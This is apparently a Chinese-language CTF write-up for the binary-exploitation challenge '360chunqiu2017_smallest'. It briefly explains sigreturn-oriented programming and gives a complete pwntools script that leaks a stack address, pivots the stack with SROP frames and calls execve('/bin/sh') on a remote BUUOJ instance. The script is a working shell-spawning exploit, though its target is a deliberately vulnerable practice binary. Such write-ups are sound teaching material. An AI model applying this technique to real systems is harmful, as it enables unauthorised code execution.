360chunqiu2017_smallest
保护检查

源码分析

程序非常简单,就是一个输入,有明显溢出
这题要用到srop
read 的返回值(本次实际读入的字节数)会留在 rax 中,因此只要控制一次输入的长度就能设置 rax:发送 1 字节得到 write(1),发送 15 字节得到 rt_sigreturn(15)。在触发 sigreturn 之前,需要先在栈上布置好 `syscall; ret` 的返回地址以及紧随其后的伪造 SigreturnFrame。
exp
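from pwn import *

# Exploit for 360chunqiu2017 "smallest".  The write-up describes the target as
# a single read into the stack: rax is the byte count read() returned, so the
# *length* of what we send selects the next syscall number (1 = write,
# 15 = rt_sigreturn).  Everything else is done with two SROP frames.
#
# Written for Python 3 pwntools: payloads are bytes and frames are serialised
# with bytes(frame); the original str(frame) / str payloads only worked on the
# Python 2 releases.  Run as `python3 exp.py LOCAL` to target ./buu instead of
# the remote instance.

context(os='linux', arch='amd64', log_level='debug')

START = 0x4000B0        # entry: rax is zeroed, then read(0, rsp, 0x400); ret
WRITE = 0x4000B3        # same path with the rax-zeroing skipped: rax keeps read's
                        # return value, so a 1-byte read turns it into write(1, rsp, 0x400)
SYSCALL_RET = 0x4000BE  # syscall; ret
PAGE_MASK = ~0xFFF
READ_SIZE = 0x400       # rdx the gadget sets; also what the SROP read asks for
BINSH_OFF = 0x200       # offset of "/bin/sh" inside the pivoted buffer

SYS_READ = 0
SYS_EXECVE = 59
SYS_RT_SIGRETURN = 15   # == number of bytes we send to make read() return 15

if args.LOCAL:
    p = process("./buu")
else:
    p = remote('node4.buuoj.cn', 26690)


def debug():
    """Attach gdb to the running target (call before the final send)."""
    gdb.attach(p)


def trigger_sigreturn():
    """Send exactly 15 bytes so the pending read() returns 15 = SYS_rt_sigreturn.

    The first 8 bytes overwrite the stack slot currently being read with
    `syscall; ret`, so the ret that follows lands on the syscall with
    rax == 15 and the kernel restores the SigreturnFrame that sits right
    above it.  The 7 filler bytes spill into the frame's first field
    (uc_flags), which rt_sigreturn does not consult.
    """
    payload = p64(SYSCALL_RET) + b'a' * 7
    if len(payload) != SYS_RT_SIGRETURN:
        raise ValueError("sigreturn trigger must be %d bytes, got %d"
                         % (SYS_RT_SIGRETURN, len(payload)))
    p.send(payload)


# Stage 1: stack becomes [START][WRITE][START].  ret -> START reads again,
# this time into the slot that holds WRITE.
p.send(p64(START) + p64(WRITE) + p64(START))
pause()

# Stage 2: one byte.  read() returns 1 -> rax = SYS_write, and the byte only
# rewrites the low byte of WRITE (0xB3) with itself.  ret -> WRITE dumps
# 0x400 bytes of stack to stdout.
p.send(b'\xb3')
pause()

# Stage 3: take the first 0x7f-terminated 6-byte run in the dump as a stack
# pointer.  This is a heuristic inherited from the original exploit: it keys
# on the first 0x7f byte in the dump being the top byte of a stack address.
# Page-align it and step 0x2000 lower to get a scratch area for the frames
# and "/bin/sh" that does not overlap what the kernel placed on the stack.
leak = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
stack = (leak & PAGE_MASK) - 0x2000
log.info("leaked stack pointer 0x%x -> scratch buffer 0x%x", leak, stack)

# Stage 4: SROP frame #1 -> read(0, stack, 0x400) and pivot rsp to `stack`,
# so the next payload is both the read buffer and the new stack.
frame = SigreturnFrame()
frame.rax = SYS_READ
frame.rdi = 0
frame.rsi = stack
frame.rdx = READ_SIZE
frame.rsp = stack
frame.rip = SYSCALL_RET
p.sendline(p64(START) + p64(SYSCALL_RET) + bytes(frame))
pause()
trigger_sigreturn()
pause()

# Stage 5: contents of the pivoted buffer:
#   [START][SYSCALL_RET][frame #2 -> execve] ... padding ... "/bin/sh\0" at +0x200
# ret -> START reads the 15-byte trigger at stack+8, rax = 15, ret -> syscall
# restores frame #2 and execve("/bin/sh", NULL, NULL) runs.
frame = SigreturnFrame()
frame.rax = SYS_EXECVE
frame.rdi = stack + BINSH_OFF
frame.rsi = 0
frame.rdx = 0
frame.rip = SYSCALL_RET
payload = p64(START) + p64(SYSCALL_RET) + bytes(frame)
if len(payload) > BINSH_OFF:
    # Would otherwise silently truncate the padding and leave "/bin/sh"
    # somewhere other than where rdi points.
    raise ValueError("frame (%d bytes) does not fit below the /bin/sh offset 0x%x"
                     % (len(payload), BINSH_OFF))
payload = payload.ljust(BINSH_OFF, b'a') + b"/bin/sh\x00"
p.sendline(payload)
pause()
trigger_sigreturn()

#debug()
p.interactive()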